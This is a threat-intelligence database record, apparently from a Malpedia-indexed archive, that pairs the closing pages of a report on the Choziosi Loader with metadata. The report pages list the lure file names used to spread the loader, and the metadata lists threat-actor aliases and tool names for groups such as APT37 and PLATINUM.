Gamepa…\r\nTokyo Rovengers Roblox Hack Script GUI 2022\r\nTop 5 Survival Addons For MCPE 1.18! - Minecraf…\r\nTriangular Geometric Bright Neon Gradient Red V…\r\nTumgir\r\nTurbo Dismount Free Download\r\nTurning Red\r\nUnderTheWitchVer020_Alpha10_0.zip\r\nWZ-MW-VG Unlock Tool Free , Enjoy!.rar\r\nWarhammer.40000.Mechanicus.Heretek.v1.4.0-CODEX…\r\nX340 COMPTE NORDVPN HQ PREMIUM UHQ FAST VPN …\r\nYour File Is Ready To Download\r\namazongift.zip\r\narmydillo\r\nbenekli_ayhan_saplar_gecerim_tiktok_videolari_s…\r\nburns_talamanca_official_visualiser\r\ndefault_fortnite_dance_earrape\r\nefy2bnrq.jgu.sfdl\r\nhttps://www.th3protocol.com/2022/Choziosi-Loader\r\nPage 18 of 19\n\nfree_ivresse_sch_ft_ninho_type_beat_w_hlk\r\nfyp\r\ngary_bb_coleman_the_sky_is_crying\r\njames_arthur_impossible_german_version_auf_deutsch\r\nmaxwell_diskothek\r\nmiyagi_andy_panda_kosandra_best_part\r\nmusique_traditionnelle_chinoise\r\nnot_my_body-build_37.rar\r\nperpetually22 aka unicornbooty.zip\r\nremboursement.rar\r\ntheHunter: Call of the Wild – Mississippi Acres…\r\ntrickbot-data-collector-backend.tgz\r\n📌 COMMENT UTILISER LES EXPLOITS / SCRIPTS SUR …\r\n1200x675 Cyber Security Wallpaper/\r\nDownload from Zippyshare\r\nEscape from Tarkov\r\nFile: Minecraft.v1.17.1.zip …\r\nLuigi’s Mansion 2\r\nMadden NFL Arcade\r\nPokemon Sword\r\nPokémon Shining Pearl SWITCH NSP/XCI\r\nRed Dead Redemption Game of The Year Edition\r\nSuper Smash Bros Ultimate\r\nTormented Souls\r\nfile: minecraft.v1.17.1.zip\r\nSource: https://www.th3protocol.com/2022/Choziosi-Loader\r\nhttps://www.th3protocol.com/2022/Choziosi-Loader\r\nPage 19 of 19", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.th3protocol.com/2022/Choziosi-Loader" ], "report_names": [ "Choziosi-Loader" ], "threat_actors": [ { "id": "6f30fd35-b1c9-43c4-9137-2f61cd5f031e", "created_at": "2025-08-07T02:03:25.082908Z", "updated_at": "2026-04-10T02:00:03.744649Z", "deleted_at": null, "main_name": "NICKEL FOXCROFT", "aliases": [ "APT37 ", "ATK4 ", "Group 123 ", "InkySquid ", "Moldy Pisces ", "Operation Daybreak ", "Operaton Erebus ", "RICOCHET CHOLLIMA ", "Reaper ", "ScarCruft ", "TA-RedAnt ", "Venus 121 " ], "source_name": "Secureworks:NICKEL FOXCROFT", "tools": [ "Bluelight", "Chinotto", "GOLDBACKDOOR", "KevDroid", "KoSpy", "PoorWeb", "ROKRAT", "final1stpy" ], "source_id": "Secureworks", "reports": null }, { "id": "7d8ef10e-1d7b-49a0-ab6e-f1dae465a1a4", "created_at": "2023-01-06T13:46:38.595679Z", "updated_at": "2026-04-10T02:00:03.033762Z", "deleted_at": null, "main_name": "PLATINUM", "aliases": [ "TwoForOne", "G0068", "ATK33" ], "source_name": "MISPGALAXY:PLATINUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e61c46f7-88a1-421a-9fed-0cfe2eeb820a", "created_at": "2022-10-25T16:07:24.061767Z", "updated_at": "2026-04-10T02:00:04.854503Z", "deleted_at": null, "main_name": "Platinum", "aliases": [ "ATK 33", "G0068", "Operation EasternRoppels", "TwoForOne" ], "source_name": "ETDA:Platinum", "tools": [ "AMTsol", "Adupib", "Adupihan", "Dipsind", "DvDupdate.dll", "JPIN", "LOLBAS", "LOLBins", "Living off the Land", "RedPepper", "RedSalt", "Titanium", "adbupd", "psinstrc.ps1" ], "source_id": "ETDA", "reports": null }, { "id": "33f527a5-a5da-496a-a48c-7807cc858c3e", "created_at": "2022-10-25T15:50:23.803657Z", "updated_at": "2026-04-10T02:00:05.333523Z", "deleted_at": null, "main_name": "PLATINUM", "aliases": [ "PLATINUM" ], "source_name": "MITRE:PLATINUM", "tools": [ "JPIN", "Dipsind", "adbupd" ], "source_id": "MITRE", "reports": null }, { "id": "9b02c527-5077-489e-9a80-5d88947fddab", "created_at": "2022-10-25T16:07:24.103499Z", "updated_at": "2026-04-10T02:00:04.867181Z", "deleted_at": null, "main_name": "Reaper", "aliases": [ "APT 37", "ATK 4", "Cerium", "Crooked Pisces", "G0067", "Geumseong121", "Group 123", "ITG10", "InkySquid", "Moldy Pisces", "Opal Sleet", "Operation Are You Happy?", "Operation Battle Cruiser", "Operation Black Banner", "Operation Daybreak", "Operation Dragon messenger", "Operation Erebus", "Operation Evil New Year", "Operation Evil New Year 2018", "Operation Fractured Block", "Operation Fractured Statue", "Operation FreeMilk", "Operation Golden Bird", "Operation Golden Time", "Operation High Expert", "Operation Holiday Wiper", "Operation Korean Sword", "Operation North Korean Human Right", "Operation Onezero", "Operation Rocket Man", "Operation SHROUDED#SLEEP", "Operation STARK#MULE", "Operation STIFF#BIZON", "Operation Spy Cloud", "Operation Star Cruiser", "Operation ToyBox Story", "Osmium", "Red Eyes", "Ricochet Chollima", "Ruby Sleet", "ScarCruft", "TA-RedAnt", "TEMP.Reaper", "Venus 121" ], "source_name": "ETDA:Reaper", "tools": [ "Agentemis", "BLUELIGHT", "Backdoor.APT.POORAIM", "CARROTBALL", "CARROTBAT", "CORALDECK", "Cobalt Strike", "CobaltStrike", "DOGCALL", "Erebus", "Exploit.APT.RICECURRY", "Final1stSpy", "Freenki Loader", "GELCAPSULE", "GOLDBACKDOOR", "GreezeBackdoor", "HAPPYWORK", "JinhoSpy", "KARAE", "KevDroid", "Konni", "MILKDROP", "N1stAgent", "NavRAT", "Nokki", "Oceansalt", "POORAIM", "PoohMilk", "PoohMilk Loader", "RICECURRY", "RUHAPPY", "RokRAT", "SHUTTERSPEED", "SLOWDRIFT", "SOUNDWAVE", "SYSCON", "Sanny", "ScarCruft", "StarCruft", "Syscon", "VeilShell", "WINERACK", "ZUMKONG", "cobeacon" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775438976, "ts_updated_at": 1775792286, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/a35a086acc21c16b20007e4190ff5a2e5121a2c8.pdf", "text": "https://archive.orkl.eu/a35a086acc21c16b20007e4190ff5a2e5121a2c8.txt", "img": "https://archive.orkl.eu/a35a086acc21c16b20007e4190ff5a2e5121a2c8.jpg" } }